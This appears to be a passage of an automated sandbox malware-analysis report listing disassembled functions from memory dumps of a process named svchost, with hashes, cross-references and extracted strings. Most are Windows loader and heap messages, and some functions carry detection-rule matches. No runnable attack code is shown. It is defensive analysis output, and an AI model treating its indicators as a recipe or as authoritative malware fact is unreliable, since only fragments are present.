                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                            • API String ID: 0-318774311
                                            • Opcode ID: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                            • Instruction ID: ed5dfdd812346fdbc2f1b0aa39f5ab6ff36f9d0dfcfad91f7de8a22f3d420e0b
                                            • Opcode Fuzzy Hash: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                            • Instruction Fuzzy Hash: 81818E79618380AFDB11DB14C984B6AB7E8FF85750F08892EF9909B3D0D778D904CB52
                                            Function 03A6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            • Opcode ID: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                            • Instruction ID: daa09888330b133a13fbe6ec16afb9d69a637325e55ccae17112f64fbf2504e3
                                            • Opcode Fuzzy Hash: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                            • Instruction Fuzzy Hash: 0071D1705087019FC754DF24CA84A2BFBE9FF85618F144A1FE4AA8B290D730D905CB96
                                            Function 03B0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                            Download Yara Rule
                                            Strings
                                            • TargetNtPath, xrefs: 03B0B82F
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03B0B82A
                                            • GlobalizationUserSettings, xrefs: 03B0B834
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            • Opcode ID: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                            • Instruction ID: f8ac4c2abfb6c65be880654ea99514b9fe64b38722deef5a26e131334f0ca0b7
                                            • Opcode Fuzzy Hash: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                            • Instruction Fuzzy Hash: A6617F76D41229ABDB21DF54DC88B9ABBB8EF04714F0101E5A508AB390DB74DE84CF90
                                            Function 03A2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: , xrefs: 03A8E6B3
                                            • HEAP[%wZ]: , xrefs: 03A8E6A6
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03A8E6C6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                            • Instruction ID: 036c4df1b96919cc5b212d43e1c54dd64e74265abfca75975e59e93e7f8505a5
                                            • Opcode Fuzzy Hash: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                            • Instruction Fuzzy Hash: FF51C135604794EFD712EB68C944FAAFBF8EF05300F0845A6E9518B792D774E950CB20
                                            Function 03ADDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                            Download Yara Rule
                                            Strings
                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03ADDC32
                                            • HEAP: , xrefs: 03ADDC1F
                                            • HEAP[%wZ]: , xrefs: 03ADDC12
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                            • API String ID: 0-3815128232
                                            • Opcode ID: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                            • Instruction ID: 8f12bc6512ad7c7b5b96af41c0907455de36936ffaef0503e1be773aac742157
                                            • Opcode Fuzzy Hash: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                            • Instruction Fuzzy Hash: B15122352046508EE374DB2EC848772B7F2EF45648F08888FE4D38F685D276E846DB21
                                            Function 03A6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 03AA82E8
                                            • Failed to reallocate the system dirs string !, xrefs: 03AA82D7
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 03AA82DE
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                            • Instruction ID: 2658679e4dca39bd962dd5367f5f5476536a5f439d4463705aadd68dadff5faa
                                            • Opcode Fuzzy Hash: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                            • Instruction Fuzzy Hash: 3A41F3B6944310ABC721EB68DA44B5B7BE8FF49764F044A2BF988D7250E774D8108B91
                                            Function 03A616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                            Download Yara Rule
                                            Strings
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03AA1B39
                                            • minkernel\ntdll\ldrtls.c, xrefs: 03AA1B4A
                                            • LdrpAllocateTls, xrefs: 03AA1B40
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            • Opcode ID: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                            • Instruction ID: a61f9d262b8ab5298d84ca0675ea41bac60394a64342d3c4f7b09d47edaecf1a
                                            • Opcode Fuzzy Hash: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                            • Instruction Fuzzy Hash: 1541587AA00608AFCB25DFA8C941BAEFBF5FF49714F14811AE405AB350D775A800CF90
                                            Function 03AEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            • PreferredUILanguages, xrefs: 03AEC212
                                            • @, xrefs: 03AEC1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03AEC1C5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                            • Instruction ID: 5ab04890a3e24fb31e98bcc2c766acfd892471d12dceba8989b9b751fc7dc686
                                            • Opcode Fuzzy Hash: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                            • Instruction Fuzzy Hash: 72418E76E00209EFDF15EBD8C995FEEB7BCAB44710F04406BE905BB290D7749A448B90
                                            Function 03AC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                            • Instruction ID: 17b1b91cf4f3f09ddc2db6c0ad6f421ffe70fffb75e7dbf7771a928249ab3641
                                            • Opcode Fuzzy Hash: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                            • Instruction Fuzzy Hash: E84111359147888BEB26DBA6C964BADBBB8EF99340F18045FD841EF381D7348901CB14
                                            Function 03AB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 03AB4899
                                            • LdrpCheckRedirection, xrefs: 03AB488F
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03AB4888
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                            • Instruction ID: 781f91ffec14b80e1bdf07fd1a3660d804d8cbcf49958b23de19f10f9d4ff7cf
                                            • Opcode Fuzzy Hash: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                            • Instruction Fuzzy Hash: B341A232A047509FCB21CFAAD940AA6B7FCBB4E650B09065EEC589B353D731D850CB91
                                            Function 03A633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • Actx , xrefs: 03A633AC
                                            • SXS: %s() passed the empty activation context data, xrefs: 03AA29FE
                                            • RtlCreateActivationContext, xrefs: 03AA29F9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                            • API String ID: 0-859632880
                                            • Opcode ID: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                            • Instruction ID: 90cc076018201ecea3f90f7c8e04fde8160ee720a7a6b78ea7e0bb2244057c5d
                                            • Opcode Fuzzy Hash: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                            • Instruction Fuzzy Hash: 6C3124366007059FDF26DF58C884B9AB7A4FB44711F09886BED059F2E2CB70D852CB90
                                            Function 03A61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrtls.c, xrefs: 03AA1A51
                                            • DLL "%wZ" has TLS information at %p, xrefs: 03AA1A40
                                            • LdrpInitializeTls, xrefs: 03AA1A47
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
                                            • Instruction ID: 32431d5cc2a7f355dff79ad443be9cb31ff9457863e162745fd04e236378f6ce
                                            • Opcode Fuzzy Hash: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
                                            • Instruction Fuzzy Hash: 2731F87AA00200BBDB30DB58CA45F7ABABCFB55758F04066FE505AB680E774AD048790
                                            Function 03A71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            • BuildLabEx, xrefs: 03A7130F
                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03A7127B
                                            • @, xrefs: 03A712A5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 0-3051831665
                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction ID: a8b8bbb8635f4c2b3293b378a0f0205e4696ba5b75bacd31a1d16628ac6f4bac
                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction Fuzzy Hash: D6316F76A00619AFDB11EF95CD84EAFBBBDEB84750F004427E914AB260D730DA058B90
                                            Function 03AB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 03AB2104
                                            • Process initialization failed with status 0x%08lx, xrefs: 03AB20F3
                                            • LdrpInitializationFailure, xrefs: 03AB20FA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                            • Instruction ID: aef50762d6a564b8665e7659e57b1d488da50fa94125045cb761eaa95823ce30
                                            • Opcode Fuzzy Hash: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                            • Instruction Fuzzy Hash: C9F02835640308BFD720E70CDD42FD9776CEB40B48F04086BF6006B682D2F0E510CA50
                                            Function 03A403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                            • Instruction ID: 8f770352b08b0b1f9371c788241d3551c7c65bfafa368bf9bbee186269fbe6fe
                                            • Opcode Fuzzy Hash: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                            • Instruction Fuzzy Hash: C3715A75A002499FDF01DFA9DA94BAEB7F8AF48304F15416AE901AB351EB34ED01CB60
                                            Function 03AD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: kLsE
                                            • API String ID: 3446177414-3058123920
                                            • Opcode ID: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                            • Instruction ID: 855d1f489da0e14072bb88a84c01dc8d93171f355f2b0ef998dc5bc328983198
                                            • Opcode Fuzzy Hash: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                            • Instruction Fuzzy Hash: 494153325013504AE335FF65EA84BA97BA4AB10B2CF18032EFDA18F6D9CBB54481C791
                                            Function 03A452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                            • Instruction ID: ad7057c915d896e68f9593e13577b879d61b08ddc5b21a22d9523fd04d0f494e
                                            • Opcode Fuzzy Hash: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                            • Instruction Fuzzy Hash: 113277749083118BDB28CF19C594B3AF7E5AFCA750F18492FF9959B2A0E734D844CB92
                                            Function 03AFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 43f70fa5d34d56a64a5fcdc68060a6d8f791d41cfd8d07da9d1eb43c14c6e85b
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: F6C1CE312047429FD724CF68C944BABFBE5AF84358F088A2EF699CA290D779D505CF51
                                            Function 03A30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                            Download Yara Rule
                                            Strings
                                            • ResIdCount less than 2., xrefs: 03A8EEC9
                                            • Failed to retrieve service checksum., xrefs: 03A8EE56
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                            • API String ID: 0-863616075
                                            • Opcode ID: 5dc734d38c555069d12d5446d83c84397d476f7f9d05c10f1da21b6129bf1b96
                                            • Instruction ID: eae62c7f7d0e92526fcc9591efc1be43e2ac25469e405032f68f141408973b1c
                                            • Opcode Fuzzy Hash: 5dc734d38c555069d12d5446d83c84397d476f7f9d05c10f1da21b6129bf1b96
                                            • Instruction Fuzzy Hash: 49E1E1B19087849FE324CF15C441BABBBE4BB88314F008A2FE59D8B381DB749509CF56
                                            Function 004028A0 Relevance: 2.8, Strings: 2, Instructions: 283COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: yxxx$yxxx
                                            • API String ID: 0-1021751087
                                            • Opcode ID: 3c976655bc268f5063e7948089cae3e12f064e3d2f5cb2694a3ae85f17b9b3b3
                                            • Instruction ID: 3bc3dbe43a24dff6d689cbee99c2a07238a9b4b6e0e9f44116daaca3de7c587f
                                            • Opcode Fuzzy Hash: 3c976655bc268f5063e7948089cae3e12f064e3d2f5cb2694a3ae85f17b9b3b3
                                            • Instruction Fuzzy Hash: ED91D971B0000947DB1CCD1CCEA466A7762E7E4315F18817BED16AF3D1EAB8AE01CB84
                                            Function 00401290 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 7[${#GK
                                            • API String ID: 0-2057546668
                                            • Opcode ID: bbe9397fe34d324214f72e7e7ccbd3542cf657e806bc295b34049414d1fda33f
                                            • Instruction ID: f025f4cac57f5596bdda6303ad9cc9813e0a11f33c1e57feca11eb29e0f4e126
                                            • Opcode Fuzzy Hash: bbe9397fe34d324214f72e7e7ccbd3542cf657e806bc295b34049414d1fda33f
                                            • Instruction Fuzzy Hash: 2691A271E1064987CF18CEA9C8901EDF7B1EF98304F24926BE815BF391E7759A418B94
                                            Function 03AAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 87ce1feed9dfd5f86b3ca11b6510a6e11b784fb8d42fafbdd4c2c73dbe695615
                                            • Instruction ID: fe63cef0f58181a8f0ad6ca9a193e05bfccce0e5103537f7dbb1726626a0688d
                                            • Opcode Fuzzy Hash: 87ce1feed9dfd5f86b3ca11b6510a6e11b784fb8d42fafbdd4c2c73dbe695615
                                            • Instruction Fuzzy Hash: 83611972E007189FDB25DFA9C980FAEBBB9FB48700F14446EE559EB291D731A940CB50
                                            Function 03A4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$
                                            • API String ID: 0-233714265
                                            • Opcode ID: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                            • Instruction ID: 14f5573c7da737d43996675d3e16fe1be76eff62064721f2db823f9f97dab2d7
                                            • Opcode Fuzzy Hash: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                            • Instruction Fuzzy Hash: E0619875A00749DFDB20EFA4C684BA9B7B1BB88308F18516FE515AF780CB74A941CB90
                                            Function 0040268A Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: VUUU$gfff
                                            • API String ID: 0-2662692612
                                            • Opcode ID: e0798994f6bda637e9b439259d019471aa6351526afccf3d24bf928b31598a2a
                                            • Instruction ID: ebef863713406b254da3ac05d9d5d042d19a73171e54c1123a48ea5a2863000a
                                            • Opcode Fuzzy Hash: e0798994f6bda637e9b439259d019471aa6351526afccf3d24bf928b31598a2a
                                            • Instruction Fuzzy Hash: DB412637B4010A03DF6C981D8F582BA6243A7E4314B59D237DC9AEF3D5E8BCED425289
                                            Function 03A3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 03A3A2FB
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 03A3A309
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                            • Instruction ID: 1e984b6ce8cfbe99f09a20eeb728b9390f0b5f5433304e694890da2cf546d44e
                                            • Opcode Fuzzy Hash: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                            • Instruction Fuzzy Hash: 02418E39A04659DBDB11CF69C840B69B7F4EF86700F1844ABEC44EB391E335D940CB51
                                            Function 03A6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local\$@
                                            • API String ID: 0-380025441
                                            • Opcode ID: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                            • Instruction ID: 217f52c9be5798c8a8e774fec2ba42c26763eceef0c792221df439a303396b1d
                                            • Opcode Fuzzy Hash: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                            • Instruction Fuzzy Hash: 8031A17A5093049FCB10DF28C984A5BBBF8EBC5654F48092FF595872A0DA30DD05CB92
                                            Function 03A3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                            • Instruction ID: 677922b58dce1b654552457bfd1fe1c2554a5188b2ce59053ef5459f6cdb6860
                                            • Opcode Fuzzy Hash: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                            • Instruction Fuzzy Hash: E8822775E00218DFDB24CFA9C984BADF7B5BF4A710F18816AE859AB394D7309D81CB50
                                            Function 03A82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: P`vRbv
                                            • API String ID: 0-2392986850
                                            • Opcode ID: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
